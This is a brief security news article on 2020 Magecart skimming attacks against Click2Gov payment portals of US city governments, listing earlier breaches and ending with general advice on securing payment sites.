Credit Card Skimming Attacks on US Local Government Services

Credit card skimming attacks are already on the rise in 2020 and it seems that this trend will continue into the near future. The security firm Trend Micro observed a new series of credit card skimming attacks in June 2020.

Magecart skimmer with a twist

In the latest attacks, the hackers used Magecart skimmer (TrojanSpy.JS.MAGECART.G) to compromise the websites. It is believed that these attacks started on April 10, 2020, and are still active.
  • The attackers targeted eight US cities’ local government services to host credit card skimmers which passed on the credit card details of residents to cybercriminals.
  • The websites using the Click2Gov platform were compromised with the JavaScript-based skimmer to exfiltrate credit card information (card number, expiration date, CVV) and personal information (name and contact address).
  • This time, attackers did not implement obfuscation or anti-debugging techniques. As soon as any user enters credit card related details, the skimmer will immediately send these to a remote server via an HTTP POST request.

Recent Click2Gov breaches

Click2Gov has been targeted by several breaches and attacks in the past.
  • In February, the financial information of Carson City residents was compromised due to a security vulnerability on its third-party vendor's online payment system, Click2Gov.
  • In January, City of Bend’s online utility payment portal using Click2Gov suffered a data security breach that compromised payment card information of some city utility customers.
  • Several other US cities (Aurora, Marietta, City of Sugar Land, City of Waco, and the City of Odessa) were affected in December 2019 data breaches.

Conclusion

Credit card skimming attacks are a major threat not only to e-commerce sites but academic institutions and hotel chains also. Organizations should keep their payment portals secure by updating all the software and plugins used in the portal and do regular auditing of the code.